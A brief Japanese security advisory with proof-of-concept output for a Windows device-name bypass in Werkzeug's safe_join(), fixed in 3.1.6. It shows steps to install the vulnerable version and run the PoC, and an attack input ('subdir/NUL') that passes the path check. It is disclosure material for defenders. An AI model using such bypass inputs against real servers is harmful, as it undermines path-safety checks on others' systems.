safe_join() Windows デバイス名バイパスステータス: 公開済み。werkzeug 3.1.6 で修正済み。
深刻度: 中 (Moderate)
報告者: @alimezar
アドバイザリ: GHSA-29vq-49wr-vm6x
| パッケージ | 影響あり | 修正済み |
|---|
| werkzeug | < 3.1.6 | 3.1.6 |
要件: Windows、Python 3.8+、
werkzeug < 3.1.6
pip install "werkzeug==3.1.5"
python poc_CVE-2026-27199.py
============================================================
CVE-2026-27199 — Werkzeug safe_join() PoC
============================================================
[*] Werkzeug version : 3.1.5
[*] os.name : nt
[+] safe_join(base, 'NUL') -> None (正しくブロック)
[!] safe_join(base, 'subdir/NUL') -> C:\...\subdir\NUL (バイパス!)
[*] 返されたパスへの書き込みを試行中 ...
[!] open(ネストされた NUL) 書き込み: 成功 — データはデバイスにより静かに破棄
[!] 脆弱性あり: このインストール環境で CVE-2026-27199 を確認。
修正には werkzeug >= 3.1.6 へのアップグレードが必要。
[+] safe_join(base, 'subdir/NUL') -> None (正しくブロック)
[+] 脆弱性なし: ネストされたデバイス名はブロックされました。
この PoC は、責任ある開示と公開パッチの提供に従い、教育および防御目的で公開されています。